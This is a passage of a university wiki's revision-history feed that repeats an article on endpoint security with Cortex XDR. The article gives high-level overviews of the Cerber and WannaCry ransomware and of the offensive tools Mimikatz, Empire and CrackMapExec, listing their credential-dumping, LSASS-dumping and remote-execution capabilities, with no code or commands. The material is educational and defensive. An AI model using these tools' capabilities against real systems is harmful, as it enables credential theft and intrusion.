* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11458</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11458"/>
		<updated>2023-02-03T16:38:30Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11457</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11457"/>
		<updated>2023-02-03T16:34:40Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://wiki.elvis.science/index.php?title=Endpoint_security_using_Cortex_XDR#Ransomware&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11285</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11285"/>
		<updated>2023-01-28T20:23:32Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Ransomware */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
